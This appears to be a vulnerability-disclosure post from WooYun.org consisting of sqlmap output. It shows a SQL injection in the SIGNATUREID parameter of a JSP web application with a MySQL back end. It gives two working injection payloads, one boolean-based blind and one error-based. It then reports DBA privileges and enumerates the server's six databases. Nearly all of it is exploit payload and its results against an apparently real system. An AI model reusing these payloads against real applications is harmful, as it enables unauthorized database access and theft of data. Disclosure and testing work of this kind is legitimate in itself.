WooYun.org

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: SIGNATUREID (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2' RLIKE (SELECT (CASE WHEN (4846=4846) THEN 2 ELSE 0x28 END)) AND 'vdyN'='vdyN
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2' AND (SELECT 2853 FROM(SELECT COUNT(*),CONCAT(0x716b766271,(SELECT (ELT(2853=2853,1))),0x71766a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yNlQ'='yNlQ
---
web application technology: JSP
back-end DBMS: MySQL 5.0
current database:    'mysql3235'
current user is DBA:    True
available databases [6]:
[*] #mysql50#mysql3235 - 
[*] information_schema
[*] mysql
[*] mysql3235
[*] mysql32351
[*] temp